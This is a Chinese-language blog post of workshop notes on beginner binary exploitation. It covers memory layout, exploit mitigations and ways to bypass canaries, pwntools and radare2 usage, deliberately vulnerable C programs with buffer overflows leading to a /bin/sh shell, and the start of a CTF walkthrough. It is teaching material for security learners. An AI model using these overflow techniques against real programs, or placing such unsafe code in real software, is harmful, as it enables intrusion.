<!DOCTYPE HTML>
<html lang="zh-TW">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="2021 Advanced CyberSecurity Day Note - PWN, Gunjyo&#39;s Blog">
    <meta name="description" content="2021.8.28-8.29 校園資安深耕營Advanced Happy CyberSecurity Day PWN 基礎漏洞分析與測試 筆記">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>2021 Advanced CyberSecurity Day Note - PWN | Gunjyo&#39;s Blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.1.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>




<body>

    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Gunjyo&#39;s Blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Gunjyo&#39;s Blog</div>
        <div class="logo-desc">
            
            To live out as I am to the death of me.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/imgs/ISIP.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">2021 Advanced CyberSecurity Day Note - PWN</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/CTF/">
                                <span class="chip bg-color">CTF</span>
                            </a>
                        
                            <a href="/tags/Note/">
                                <span class="chip bg-color">Note</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/note/" class="post-category">
                                note
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2021-08-29
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>Word Count:&nbsp;&nbsp;
                    2.2k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>Read Times:&nbsp;&nbsp;
                    9 Min
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>Read Count:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				

                <div class="info-break-policy">
                    
                    <i class="fa fa-pencil"></i> 作者: Gunjyo
                    
                </div>
                
            </div>
        </div>
        <hr class="clearfix">

        

        
        <!-- 代码块折行 -->
        <style type="text/css">
            code[class*="language-"], pre[class*="language-"] { white-space: pre-wrap !important; }
        </style>
        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="PWN-Intro"><a href="#PWN-Intro" class="headerlink" title="PWN Intro"></a>PWN Intro</h2><h3 id="What-is-PWN"><a href="#What-is-PWN" class="headerlink" title="What is PWN?"></a>What is PWN?</h3><blockquote>
<p>控制程式流程進而觸發攻擊</p>
</blockquote>
<p>正常程式流程 Start -&gt; Input &lt;-&gt; Output -&gt; End</p>
<blockquote>
<p>Input：使用者輸入、操作<br>Output：反應 Input 所產生的動作(運算、輸出等)</p>
</blockquote>
<p>不正常的程式流程 Start -&gt; Input &lt;-&gt; Output -&gt; Segmentation Fault</p>
<h3 id="HOW-TO-PWN"><a href="#HOW-TO-PWN" class="headerlink" title="HOW TO PWN"></a>HOW TO PWN</h3><blockquote>
<p>尋找漏洞，進一步利用</p>
</blockquote>
<p>方法：</p>
<ol>
<li>Fuzz 模糊測試：自動產生隨機輸入來尋找漏洞</li>
<li>看原始碼、組合語言找漏洞</li>
</ol>
<p>目標：Start -&gt; Input &lt;-&gt; Output -&gt; Shell</p>
<h2 id="Program-Structure"><a href="#Program-Structure" class="headerlink" title="Program Structure"></a>Program Structure</h2><p><img src="https://i.imgur.com/waRLosZ.png"></p>
<h3 id="Text-程式碼-Binary"><a href="#Text-程式碼-Binary" class="headerlink" title="Text - 程式碼 Binary"></a>Text - 程式碼 Binary</h3><p>r-x 可讀 不可寫 可執行</p>
<h3 id="Data-已初始化的全域變數"><a href="#Data-已初始化的全域變數" class="headerlink" title="Data - 已初始化的全域變數"></a>Data - 已初始化的全域變數</h3><p>Ex. 字串、數字</p>
<h3 id="BSS-未初始化的全域變數"><a href="#BSS-未初始化的全域變數" class="headerlink" title="BSS - 未初始化的全域變數"></a>BSS - 未初始化的全域變數</h3><h3 id="Heap-動態記憶體空間"><a href="#Heap-動態記憶體空間" class="headerlink" title="Heap - 動態記憶體空間"></a>Heap - 動態記憶體空間</h3><p><strong>從低位往高位長</strong></p>
<p>c 常用的 <code>malloc()</code>/<code>free()</code> 拿出來的空間來源為 Heap</p>
<h3 id="Stack-存放暫存資料"><a href="#Stack-存放暫存資料" class="headerlink" title="Stack - 存放暫存資料"></a>Stack - 存放暫存資料</h3><p>Stack：FILO 先進後出<br>暫存資料 Ex.區域變數、return address、參數、回傳值<br><strong>從高位往低位長</strong></p>
<p>stack top 存在 rop</p>
<blockquote>
<p>Stack 跟 Heap 不會碰到</p>
</blockquote>
<h4 id="區域變數-Local-Variable"><a href="#區域變數-Local-Variable" class="headerlink" title="區域變數 Local Variable"></a>區域變數 Local Variable</h4><p>先宣告的先存</p>
<pre class=" language-c"><code class="language-c"><span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">int</span> a <span class="token operator">=</span> <span class="token number">0x123</span><span class="token punctuation">;</span>
    <span class="token keyword">int</span> b <span class="token operator">=</span> <span class="token number">0x456</span><span class="token punctuation">;</span>
    <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token punctuation">}</span>
</code></pre>
<p><img src="https://i.imgur.com/Jx9sVHS.png"><br>rsp 表示最低位<br>一個 block 8 個 byte</p>
<h4 id="Return-address"><a href="#Return-address" class="headerlink" title="Return address"></a>Return address</h4><p>Q：Call function 時，怎麼知道執行完要回到哪裡?<br>call function前，將 return address 存進 stack<br>return 時，回到 stack 中所存的位址</p>
<pre class=" language-c"><code class="language-c"><span class="token keyword">void</span> <span class="token function">process</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
    <span class="token keyword">return</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">int</span> a <span class="token operator">=</span> <span class="token number">8</span><span class="token punctuation">;</span>
    <span class="token function">process</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    a <span class="token operator">=</span> a<span class="token operator">+</span><span class="token number">1</span><span class="token punctuation">;</span>
    <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
    <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre>
<p><img src="https://i.imgur.com/gaPvpDU.png"></p>
<p><code>process()</code>執行完後<code>...</code>會還原 ，跳過去<code>return address</code>指向的位置，接著 <code>pop</code>掉<code>return address</code></p>
<h2 id="Security-Options"><a href="#Security-Options" class="headerlink" title="Security Options"></a>Security Options</h2><p><code>checksec ./exe</code> 查看保護機制</p>
<h3 id="RELRO"><a href="#RELRO" class="headerlink" title="RELRO"></a>RELRO</h3><p>RELocation Read Only</p>
<div class="spoiler collapsed">
    <div class="spoiler-title">
        前行摘要-Lazy Binding
    </div>
    <div class="spoiler-content">
        <p>把所有的函式實作都包在一起<br>好處：執行方便<br>壞處：檔案太肥</p>
<p>Dynamic linking 的程式在執行過程中，有些 library 的函式到結束都不會執行到。</p>
<p>ELF 採取 Lazy binding 的機制，在<strong>第一次 call library 函式時，才會去尋找函式真正的位置進行 binding</strong></p>
<blockquote>
<p>實現 Lazy Binding<br>GOT &amp; PLT<br>GOT(Global Offset Table)：函式指標陣列，存了其他 library 中 function address。</p>
</blockquote>
<p>因為 Lazy binding 的機制，一開始只會填上一段 <code>.plt</code> 的 code</p>
<p>第一次執行時，<code>plt</code>會呼叫<code>_dl_fixup()</code>，才會去真正的 function 並填入 GOT。</p>
<p>第二次執行時，直接透過 GOT 找到 function address</p>
<p><img src="https://i.imgur.com/hUPU3vI.png"></p>
<ol>
<li>call <code>read()</code> </li>
<li>Read 的 GOT 先去 GOT 表查找有沒有已經存放 read address</li>
</ol>
<ul>
<li>沒有 -&gt; 進入 <code>resolve()</code> 來找<code>read()</code>真正的位址，然後記錄到 GOT 表，並 return 回 call read (執行)</li>
<li>有 -&gt; 直接 return 回 call read (執行)</li>
</ul>

    </div>
</div>

<ul>
<li>No RELRO - link 和 GOT 都可寫</li>
<li>Partial RELRO - link map 不可寫，GOT 可寫(可利用來PWN)</li>
<li>Full ReLRO - link map 和 GOT 都不可寫</li>
</ul>
<h3 id="Stack-Canary"><a href="#Stack-Canary" class="headerlink" title="Stack Canary"></a>Stack Canary</h3><p>stack 上的柵欄<br>在 rbp 之前塞一個 random 值，ret 之前檢查是否相同，不同的話就會<code>abort</code><br><img src="https://i.imgur.com/Nub9RNa.png"><br>沒有 canary 的話，發生 buffer overflow 時就可以一直往下寫(return address等)<br>有 canary 的話，它發現後就會直接關掉程式<br><img src="https://i.imgur.com/ZCJ3KCP.png"></p>
<p>繞過</p>
<ul>
<li>想辦法事先取得 Canary 的值</li>
<li>只蓋掉 canary 前的值 / 直接蓋掉 canary 後的值</li>
</ul>
<h3 id="NX-No-eXecute"><a href="#NX-No-eXecute" class="headerlink" title="NX(No eXecute)"></a>NX(No eXecute)</h3><p>又稱 DEP(Data Execution Prevention)<br>可寫的不可執行，可執行的不可寫<br><img src="https://i.imgur.com/LmO0kk3.png"><br>可寫可執行很危險(把程式碼寫到這個空間，跳過去直接執行)</p>
<h3 id="PIE-Position-Independent-Executable"><a href="#PIE-Position-Independent-Executable" class="headerlink" title="PIE(Position Independent Executable)"></a>PIE(Position Independent Executable)</h3><p>開啟時， data 段以及 code 段位址隨機化<br>關閉時， data 段以及 code 段位址固定</p>
<p>攻擊時有時須跳到程式中的某個區段，PIE打開的話不能跳</p>
<h3 id="ASLR-Address-Space-Layout-Randomization"><a href="#ASLR-Address-Space-Layout-Randomization" class="headerlink" title="ASLR(Address Space Layout Randomization)"></a>ASLR(Address Space Layout Randomization)</h3><p>記憶體位址隨機化<br>每次執行時，stack、heap、library 位置都不一樣</p>
<blockquote>
<p>ASLR為系統設定，不是程式設定</p>
</blockquote>
<h2 id="Tools"><a href="#Tools" class="headerlink" title="Tools"></a>Tools</h2><h3 id="nc-x2F-ncat"><a href="#nc-x2F-ncat" class="headerlink" title="nc/ncat"></a>nc/ncat</h3><p>pwn 題目常用的遠端連線工具<br>使用 ncat 將程式在遠端架起來，接著使用 nc 連線</p>
<pre class=" language-bash"><code class="language-bash">% ncat -vc <span class="token variable">$binary</span> -kl <span class="token variable">$ip</span> <span class="token variable">$port</span>
% nc <span class="token variable">$ip</span> <span class="token variable">$port</span>
</code></pre>
<h3 id="gdb"><a href="#gdb" class="headerlink" title="gdb"></a>gdb</h3><p><code>% j *0x4896aa</code> 跳到某個位址(jmp)</p>
<p><code>% x/10gx 0x400686</code> 秀出某位址的值</p>
<p><code>% set $rax=0x5</code> 設定某個位址/暫存器的值</p>
<h3 id="checksec-查看程式的安全性保護"><a href="#checksec-查看程式的安全性保護" class="headerlink" title="checksec 查看程式的安全性保護"></a>checksec 查看程式的安全性保護</h3><p><code>%checksec $library</code><br><img src="https://i.imgur.com/f0gtvqq.png"></p>
<h3 id="gdb-vmmap"><a href="#gdb-vmmap" class="headerlink" title="gdb - vmmap"></a>gdb - vmmap</h3><p>查看目前程式的記憶體分布、rwn 權限設定<br><code>% vmmap</code></p>
<pre class=" language-bash"><code class="language-bash">b main <span class="token punctuation">(</span>breakpoint<span class="token punctuation">)</span>
r
vmmap
</code></pre>
<h3 id="pwntools"><a href="#pwntools" class="headerlink" title="pwntools"></a>pwntools</h3><p>用來和遠端程式互動的 python 套件</p>
<pre class=" language-bash"><code class="language-bash">% pip <span class="token function">install</span> pwntools
</code></pre>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

<span class="token comment" spellcheck="true"># connect to server(二擇一)</span>
r <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./add'</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true"># localhost binary 本地端程式</span>
r <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">'140.113.0.3'</span> <span class="token punctuation">,</span> <span class="token number">8080</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true"># remote binary(IP,port) 遠端程式</span>

s <span class="token operator">=</span> r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">':'</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true"># receive from binary until ':'</span>
<span class="token keyword">print</span> <span class="token string">'1: '</span> <span class="token operator">+</span> s

s <span class="token operator">=</span> r<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'?'</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'$'</span> <span class="token operator">+</span> s <span class="token operator">+</span> <span class="token string">'$'</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true">#辨識 s 取到那些</span>

r<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'3 5'</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true"># send to server (相當於在鍵盤上打 3 5 )</span>

r<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true"># switch to interation mode</span>
</code></pre>
<h3 id="readelf"><a href="#readelf" class="headerlink" title="readelf"></a>readelf</h3><p>分析 elf / binary 的工具<br><code>% readelf -a $libc | less</code></p>
<p><code>% readelf -a $libc | grep 'printf'</code> 找出所有有<code>printf</code>的function</p>
<h3 id="ROPgadget"><a href="#ROPgadget" class="headerlink" title="ROPgadget"></a>ROPgadget</h3><p>列出 binary 中可以使用的 ROP gadget<br><code>% ROPgadget --binary $ binary</code></p>
<h3 id="radare2"><a href="#radare2" class="headerlink" title="radare2"></a>radare2</h3><p>動態、靜態分析都可以⽤的⼯具<br><a target="_blank" rel="noopener" href="https://frozenkp.github.io/reverse/radare2/">講師的使用教學</a></p>
<pre class=" language-bash"><code class="language-bash">% <span class="token function">git</span> clone https://github.com/radare/radare2.git
% <span class="token function">sudo</span> ./radare2/sys/install.sh
</code></pre>
<p><code>% r2 $binary </code></p>
<pre class=" language-bash"><code class="language-bash">q <span class="token comment" spellcheck="true"># 退出</span>
? <span class="token comment" spellcheck="true"># 顯示指令</span>
p? <span class="token comment" spellcheck="true"># 顯示 p 開頭的指令</span>
aa <span class="token comment" spellcheck="true">#分析</span>
afl <span class="token comment" spellcheck="true"># 列出所有 function</span>
afn <span class="token variable">$new_name</span> <span class="token variable">$old_name</span> <span class="token comment" spellcheck="true">#修改 function 名</span>
afvn <span class="token variable">$new_name</span> <span class="token variable">$old_name</span> <span class="token comment" spellcheck="true">#修改區域變數名</span>
s <span class="token variable">$function_name</span> <span class="token comment" spellcheck="true">#移動到其他位置</span>
<span class="token comment" spellcheck="true">#Ex. s main</span>
s <span class="token variable">$address</span> <span class="token comment" spellcheck="true">#移動到其他位置</span>
<span class="token comment" spellcheck="true">#Ex. s 0x0000610</span>
pd <span class="token variable">$n_line</span> <span class="token comment" spellcheck="true">#印出從現在位置開始 n 行的 asm</span>
pdf <span class="token comment" spellcheck="true"># 印出現在位置的整個 function 內容</span>
</code></pre>
<p>Mode</p>
<ul>
<li>CLI Mode</li>
<li>Hex Mode</li>
<li>Visual Mode<br><img src="https://i.imgur.com/UNorzos.png" alt="switch"></li>
</ul>
<hr>

<h2 id="Buffer-Overflow"><a href="#Buffer-Overflow" class="headerlink" title="Buffer Overflow"></a>Buffer Overflow</h2><ul>
<li>輸入時沒有控制輸入長度，導致記憶體空間被輸入覆蓋掉</li>
<li>通常發⽣在 char 陣列 (字串) 的輸入</li>
</ul>
<h3 id="Ex"><a href="#Ex" class="headerlink" title="Ex"></a>Ex</h3><pre class=" language-cpp"><code class="language-cpp"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">char</span> buffer<span class="token punctuation">[</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token function">gets</span><span class="token punctuation">(</span>buffer<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// Input</span>
    <span class="token function">puts</span><span class="token punctuation">(</span>buffer<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// Output</span>
    <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre>
<p>compile and execute</p>
<pre class=" language-bash"><code class="language-bash">% gcc test.c -fno-stack-protector -o <span class="token function">test</span>
% ./test
hello
hello
</code></pre>
<p>Q：若輸入很大字串?</p>
<pre class=" language-bash"><code class="language-bash">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
</code></pre>
<p><img src="https://i.imgur.com/KWnvPO7.png"><br><img src="https://i.imgur.com/4hB4Ihj.png"></p>
<h3 id="輸入："><a href="#輸入：" class="headerlink" title="輸入："></a>輸入：</h3><ol>
<li>gets 沒有限制輸入長度<pre class=" language-cpp"><code class="language-cpp"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
 <span class="token keyword">char</span> buffer<span class="token punctuation">[</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
 <span class="token function">gets</span><span class="token punctuation">(</span>buffer<span class="token punctuation">)</span><span class="token punctuation">;</span>
 <span class="token function">puts</span><span class="token punctuation">(</span>buffer<span class="token punctuation">)</span><span class="token punctuation">;</span>
 <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre>
</li>
<li>read 有限制最大輸入長度，可 overflow ⼤⼩為最⼤輸入長度與 buffer 長度之間<pre class=" language-cpp"><code class="language-cpp"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
 <span class="token keyword">char</span> buffer<span class="token punctuation">[</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
 <span class="token function">read</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> buffer<span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">//只能 overflow 8 bytes(最大長度16-buffer長度8)</span>
 <span class="token function">puts</span><span class="token punctuation">(</span>buffer<span class="token punctuation">)</span><span class="token punctuation">;</span>
 <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre>
</li>
</ol>
<h3 id="應用"><a href="#應用" class="headerlink" title="應用"></a>應用</h3><p>stack 上</p>
<ul>
<li>local variable</li>
<li>saved rbp -&gt; stack migration</li>
<li>return address -&gt; ret2 series</li>
</ul>
<h3 id="local-variable"><a href="#local-variable" class="headerlink" title="local variable"></a>local variable</h3><pre class=" language-cpp"><code class="language-cpp"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">int</span> a <span class="token operator">=</span> <span class="token number">8</span><span class="token punctuation">;</span>
    <span class="token keyword">char</span> buffer<span class="token punctuation">[</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token function">gets</span><span class="token punctuation">(</span>buffer<span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token keyword">if</span><span class="token punctuation">(</span>a <span class="token operator">==</span> <span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token function">system</span><span class="token punctuation">(</span>“<span class="token operator">/</span>bin<span class="token operator">/</span>sh”<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre>
<p>計算 offset (從開始寫的位置到目標位置間的長度)</p>
<ul>
<li>先隨意輸入來確定 buffer 位置</li>
<li>計算 buffer 位置和⽬標位置距離多遠<br><img src="https://i.imgur.com/EbmFcCW.png"><br>0x7fffffffe7a8：buffer 位置<br>0x7fffffffe798：目標位置<br><code>offset = 0x7fffffffe7a8 - 0x7fffffffe798 = 0x10</code></li>
</ul>
<div class="spoiler collapsed">
    <div class="spoiler-title">
        [題目] luck
    </div>
    <div class="spoiler-content">
        <p>先去執行看看，它會讓我們輸入東西<br><img src="https://i.imgur.com/x9wSaUD.png"></p>
<p>♟️我們可以先用 r2 去分析第一階段要做什麼<br><img src="https://i.imgur.com/rf8z3sR.png"></p>
<pre class=" language-bash"><code class="language-bash">$ r2 ./luck <span class="token comment" spellcheck="true">#進入 r2</span>
<span class="token operator">></span> aa <span class="token comment" spellcheck="true">#分析</span>
<span class="token operator">></span> afl <span class="token comment" spellcheck="true">#列出 function，其中我們可以看到 main()</span>
<span class="token operator">></span> s main <span class="token comment" spellcheck="true">#進到 main()</span>
<span class="token operator">></span> VV <span class="token comment" spellcheck="true">#visual mode</span>
</code></pre>
<p>♟️進入visual mode</p>
<blockquote>
<p>技巧：從call function 看(綠色的)</p>
</blockquote>
<p><img src="https://i.imgur.com/DMNnJgh.png"><br>call function 的前面(mov…)在設定 call function 的參數</p>
<p><img src="https://i.imgur.com/dRBlWGN.png"><br>從這裡可以看到它會去比較(<code>cmp</code>)兩次，都是 true 的話會有個 “Hello hacker,now guess the password”，所以我們的目標是進入這裡</p>
<p>♟️看一下 main function 有哪些區域變數<br><img src="https://i.imgur.com/cfk0L22.png"><br>將上面這些整理為 <img src="https://i.imgur.com/FjKrbOu.png" height="50%"></p>
<blockquote>
<p>rbp 位於藍色與綠色塊中間</p>
</blockquote>
<p>♟️再來看一下 random<br>可以看到 random call 完後，eax 就會回傳產出的 random 值，將它存在 <code>var_ch</code> 內</p>
<p>♟️接著看一下能夠輸入多少字<br><img src="https://i.imgur.com/Rxn5afJ.png"><br>在 read function 可以看到 <code>buff</code> 在<code>var_20h</code><br><code>mov edx, 0x64</code> 可以看出我們可以輸入 64 個 bytes</p>
<p><img src="https://i.imgur.com/7F3sWAq.png"><br>從這張圖可以看到 <code>var_20h</code> ，也就是 buffer，只有 4 個 bytes，但我們卻可以輸入 64 個，因此我們可以做 overflow的大小為 64 - 4 = 60，藍色的範圍都是我們可以控制的</p>
